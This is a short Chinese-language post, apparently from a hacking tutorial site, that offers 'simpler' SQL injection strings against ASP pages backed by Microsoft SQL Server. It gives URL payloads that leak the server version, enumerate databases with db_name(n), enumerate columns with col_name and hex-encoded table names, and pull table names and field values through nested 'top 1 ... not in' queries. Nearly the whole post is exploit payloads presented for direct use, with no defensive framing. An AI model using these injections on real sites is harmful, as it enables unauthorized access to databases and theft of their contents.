注入的几条简单语句，不用像网上那样复杂

核心提示：一、版本url/1.asp?id=1 and @@VERSION>0二、跨库url/1.asp?id=1 and 1＝(select db_name(n))n改成0,1,2,3……就可以跨库了，是不是比网上的简单呢？三、列名url/1.asp?id=1 and 1=(select co

一、版本

url/1.asp?id=1 and @@VERSION>0

二、跨库

url/1.asp?id=1 and 1＝(select db_name(n))

n改成0,1,2,3……就可以跨库了，是不是比网上的简单呢？

三、列名

url/1.asp?id=1 and 1=(select col_name(object_id('表名'),n) '表名'可以换成16进制。像bbsuser=0x6200620073007500730065007200（不可以去掉0）

四、表名字段值

select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('表名1,表名2'))

字段值:

select top 1 列名 from 表名 where 列名 not in (select top n 列名 from 表名)

n改1,2,3,4就可以得库名、列名